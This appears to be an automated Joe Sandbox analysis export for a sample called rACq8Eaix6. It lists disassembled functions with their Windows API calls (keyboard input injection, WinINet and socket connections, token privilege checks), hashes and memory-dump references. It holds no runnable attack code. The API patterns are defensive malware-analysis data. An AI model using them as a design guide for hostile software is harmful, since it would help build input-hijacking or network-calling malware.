Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 608651b27def15bd1e6a010101d5b051c72471c1f375366c70583a73a6f1e64c
Instruction ID: e970030c95902c9bed20a7f01aec1974fcf08ef248fa493ca255ce5629dfcec1
Opcode Fuzzy Hash: 608651b27def15bd1e6a010101d5b051c72471c1f375366c70583a73a6f1e64c
Instruction Fuzzy Hash: 4941B1357002006FEB60AF24CC86F2AB7E4AB05B50F04806DFA69AB3C2EB719D019791

Function 00C4641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C5F910), ref: 00C464A7
_strlen.LIBCMT ref: 00C464D9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 5ec69f8deb5e2cb5c5522bd5ceb9307f0693adad9b72e9b21c42632883024421
Instruction ID: 0dac952e9a05fc669966cb23b3c50bbb35c836198746f8b2df8a5409079a8413
Opcode Fuzzy Hash: 5ec69f8deb5e2cb5c5522bd5ceb9307f0693adad9b72e9b21c42632883024421
Instruction Fuzzy Hash: C141A675900104ABCB14FBA8DC95FBEB7E9BF05310F1481A6F91597396EB30AE05C751

Function 00C3B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C3B89E
GetLastError.KERNEL32(?,00000000), ref: 00C3B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C3B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C3B915

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d4499a71798adc3fbf2b83373d7f6a2cf061b6d8a246b68a16a917eb489b0093
Instruction ID: a94477c9bd7248be9c56d71495a0800897212144c76e6e0f46c6359439657cfb
Opcode Fuzzy Hash: d4499a71798adc3fbf2b83373d7f6a2cf061b6d8a246b68a16a917eb489b0093
Instruction Fuzzy Hash: CB412539A00A10DFCB10EF15C484A5DBBF1AF4A750F098099ED5AAB362DB31FD42DB91

Function 00C58851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C588DE

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 879715909a75012d4149a95a7636e03b89bf29fb3a0c7ac8319128d150e21782
Instruction ID: ec958d94ecc869b6bb3da5291f61fb64d04108592631ad4b8c5051c0be1b91b6
Opcode Fuzzy Hash: 879715909a75012d4149a95a7636e03b89bf29fb3a0c7ac8319128d150e21782
Instruction Fuzzy Hash: D131C53C600108EEEF259A55CC85BBD77A5EB05312F944116FE21F62E1CE319ACC9B5A

Function 00C5AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C5AB60
GetWindowRect.USER32(?,?), ref: 00C5ABD6
PtInRect.USER32(?,?,00C5C014), ref: 00C5ABE6
MessageBeep.USER32(00000000), ref: 00C5AC57

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9988aed4c348b09d54ece5cc2e7c043229dcc9d7729123e40de437a2224855bf
Instruction ID: 23794bad7f616d7c2ba45bb82f8bd4a51280b9db370de8dace05db9b111236df
Opcode Fuzzy Hash: 9988aed4c348b09d54ece5cc2e7c043229dcc9d7729123e40de437a2224855bf
Instruction Fuzzy Hash: 7141B138600208DFCB11DF5AC884B6D7BF5FF49302F1482A9EC559B261D732E985CB9A

Function 00C30AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C30B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C30B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C30BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C30BFB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9f289d5040d7aed89f5c223bdd57772ae4453eb5c137fa4e2a1de52c4fd3dce1
Instruction ID: c530f14954fd48e3b31fce7230f776292685c28d9a2a000a1526c606eb2a4965
Opcode Fuzzy Hash: 9f289d5040d7aed89f5c223bdd57772ae4453eb5c137fa4e2a1de52c4fd3dce1
Instruction Fuzzy Hash: 8F317C72D50718AFFF348B298C15BFEFBA9AB4431DF24425AF4A1521D1C3748A819751

Function 00C30C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C30C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C30C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C30CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C30D33

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d1c195147c9c1a62fbd66325d036b8a6bdf6a04396d8fbe12932540373be69eb
Instruction ID: 9da576d8ac3664865bc428d82f137e9659fcec166af8f0d1de6e61fd58de0925
Opcode Fuzzy Hash: d1c195147c9c1a62fbd66325d036b8a6bdf6a04396d8fbe12932540373be69eb
Instruction Fuzzy Hash: 6731CD329103186EFF308B65EC247FEBBB5AB45311F24532EE4A1621D1C3349E85D752

Function 00C061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C061FB
__isleadbyte_l.LIBCMT ref: 00C06229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C06257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C0628D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 298dae9e2a83afffc1b4f61b6da520159bf5baad10177210233a194859786186
Instruction ID: 17eb8d4a2391807a2710ba97bc7c8be087c346c844c687969add4459d672592e
Opcode Fuzzy Hash: 298dae9e2a83afffc1b4f61b6da520159bf5baad10177210233a194859786186
Instruction Fuzzy Hash: 5E31AD3160424AAFDF218F65CC44BBE7BA9FF41310F154069E8649B1E1E731EAA1DB90

Function 00C54EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C54F02

Part of subcall function 00C33641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C3365B
Part of subcall function 00C33641: GetCurrentThreadId.KERNEL32 ref: 00C33662
Part of subcall function 00C33641: AttachThreadInput.USER32(00000000,?,00C35005), ref: 00C33669

GetCaretPos.USER32(?), ref: 00C54F13
ClientToScreen.USER32(00000000,?), ref: 00C54F4E
GetForegroundWindow.USER32 ref: 00C54F54

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2b11f5acc279ba33dce4a55c1a30c15ca2a499ded7d3bc52213cf63f8fc6ecfb
Instruction ID: be4e558b8b284696329ca1eda591308e9b59fd9cfa13171ed94823fe578ff7cd
Opcode Fuzzy Hash: 2b11f5acc279ba33dce4a55c1a30c15ca2a499ded7d3bc52213cf63f8fc6ecfb
Instruction Fuzzy Hash: 39311075D00108AFDB04EFA5C885AEFF7FDEF98304F10406AE415E7241EA719E458BA1

Function 00C5C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

GetCursorPos.USER32(?), ref: 00C5C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C0B9AB,?,?,?,?,?), ref: 00C5C4E7
GetCursorPos.USER32(?), ref: 00C5C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C0B9AB,?,?,?), ref: 00C5C56E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9f43dbfc5784c36b3561d8ed00bbc48ee7de26ecc42b3063e1fba99d1e460b57
Instruction ID: a9dd5a20da7564a9310fa93e1a033705e868dd12902604c73404a10a17ad807b
Opcode Fuzzy Hash: 9f43dbfc5784c36b3561d8ed00bbc48ee7de26ecc42b3063e1fba99d1e460b57
Instruction Fuzzy Hash: AA31E539500158AFCF16CF98C898FAE7BB5EB09311F404059FC0587262D731AE94EB98

Function 00C28656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C28121
Part of subcall function 00C2810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C2812B
Part of subcall function 00C2810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C2813A
Part of subcall function 00C2810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C28141
Part of subcall function 00C2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C28157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C286A3
_memcmp.LIBCMT ref: 00C286C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C286FC
HeapFree.KERNEL32(00000000), ref: 00C28703

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: dc6af6c4cc1970cfa972b83ec0a9a3cff7359fe8863994028670d1da54e0061f
Instruction ID: 046539961b575a17993e70592eb09dbfd87af26a43db5fb6acd7e50ebe3503e8
Opcode Fuzzy Hash: dc6af6c4cc1970cfa972b83ec0a9a3cff7359fe8863994028670d1da54e0061f
Instruction Fuzzy Hash: 3021C131E02218EFDB14DFA4D949BEEB7B8EF50315F144059E415A7240DB30AE09CB50

Function 00BF098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00BF09AE

Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C37896,?,?,00000000), ref: 00BD5A2C
Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C37896,?,?,00000000,?,?), ref: 00BD5A50

_fprintf.LIBCMT ref: 00BF09E5
OutputDebugStringW.KERNEL32(?), ref: 00C25DBB

Part of subcall function 00BF4AAA: _flsall.LIBCMT ref: 00BF4AC3

__setmode.LIBCMT ref: 00BF0A1A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 0abb70ce2bead36234fb72cf884b012647fd4b25fbf28022cfcc54dfb79bf764
Instruction ID: 772b8128541a4d4a31e504c10377796ba841de7c87592f6cc517e5014759b4c2
Opcode Fuzzy Hash: 0abb70ce2bead36234fb72cf884b012647fd4b25fbf28022cfcc54dfb79bf764
Instruction Fuzzy Hash: 2311057190460C6BDB04B3B49C869BFB7E89F42360F2400D6F20497292FF30494A57A4

Function 00C41767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C417A3

Part of subcall function 00C4182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C4184C
Part of subcall function 00C4182D: InternetCloseHandle.WININET(00000000), ref: 00C418E9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 455065e36e3aedbf26ed4cbc600de6016488cda8163457ddc8f518f67b981a26
Instruction ID: effb46604d25ba97daae2e3601c47ddb3cf057843607d5b65e17f2b8f1e2fd5e
Opcode Fuzzy Hash: 455065e36e3aedbf26ed4cbc600de6016488cda8163457ddc8f518f67b981a26
Instruction Fuzzy Hash: B6212335200705BFEB168F60CC01FBABBA9FF48711F19002EFE9196290DB71D991A7A0

Function 00C33A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C5FAC0), ref: 00C33A64
GetLastError.KERNEL32 ref: 00C33A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C33A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C5FAC0), ref: 00C33ADF

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 830ca9738d030ff6a6ca547db50661d191996de798b584c99491e328a44c3026
Instruction ID: 654f8a55f4ec8f9ee15c7019dfcfbe0a9e0b65b8cf88ff0fb275969b8627c73a
Opcode Fuzzy Hash: 830ca9738d030ff6a6ca547db50661d191996de798b584c99491e328a44c3026
Instruction Fuzzy Hash: 9921D3741183019F8310DF28CC859AAB7E8EF15364F104A6EF4A9C72A1EB31DE4ADB52

Function 00C2DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C2DCD3,?,?,?,00C2EAC6,00000000,000000EF,00000119,?,?), ref: 00C2F0CB
Part of subcall function 00C2F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C2DCD3,?,?,?,00C2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C2F0F1
Part of subcall function 00C2F0BC: lstrcmpiW.KERNEL32(00000000,?,00C2DCD3,?,?,?,00C2EAC6,00000000,000000EF,00000119,?,?), ref: 00C2F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C2DCEC
lstrcpyW.KERNEL32(00000000,?,?,00C2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C2DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C2DD46

Strings

cdecl, xrefs: 00C2DD3D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1f1077bdb9acd30197ba03e364c6a419337fc28316fc4137411e0f44f62de3a5
Instruction ID: 1f7054d637ac92769581b6a89e0bbafe7be0629d33faf9e0e1cf89c7816e1516
Opcode Fuzzy Hash: 1f1077bdb9acd30197ba03e364c6a419337fc28316fc4137411e0f44f62de3a5
Instruction Fuzzy Hash: 0C11B13A200315EBDB25AF34E845A7E77A8FF45310F40407AF916CB6A1EB719941D7A0

Function 00C050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C05101

Part of subcall function 00BF571C: __FF_MSGBANNER.LIBCMT ref: 00BF5733
Part of subcall function 00BF571C: __NMSG_WRITE.LIBCMT ref: 00BF573A
Part of subcall function 00BF571C: RtlAllocateHeap.NTDLL(017D0000,00000000,00000001,00000000,?,?,?,00BF0DD3,?), ref: 00BF575F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4d1af9a185e44164f66624777fd10d841fe58e3867bfb5af75c0c8ed82e46123
Instruction ID: 3384246a0012d1a9d1d13ce4a64e3b3de3a7acf849a8a43bb1be17056c2a187c
Opcode Fuzzy Hash: 4d1af9a185e44164f66624777fd10d841fe58e3867bfb5af75c0c8ed82e46123
Instruction Fuzzy Hash: 3A110672504A19AFCF312F70AC0977F37D89F00361B10096AFA549B1E1DF318A45DB90

Function 00C46369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C37896,?,?,00000000), ref: 00BD5A2C
Part of subcall function 00BD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C37896,?,?,00000000,?,?), ref: 00BD5A50

gethostbyname.WSOCK32(?,?,?), ref: 00C46399
WSAGetLastError.WSOCK32(00000000), ref: 00C463A4
_memmove.LIBCMT ref: 00C463D1
inet_ntoa.WSOCK32(?), ref: 00C463DC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: f029110d3c54b2edb63612ed6cfcd1ef549b75b1c8e965e5bb0225e4e247f9f3
Instruction ID: 75c5dca3c8e171dca8122ae00990c58b1e2c8823b38d423418965f34efad3771
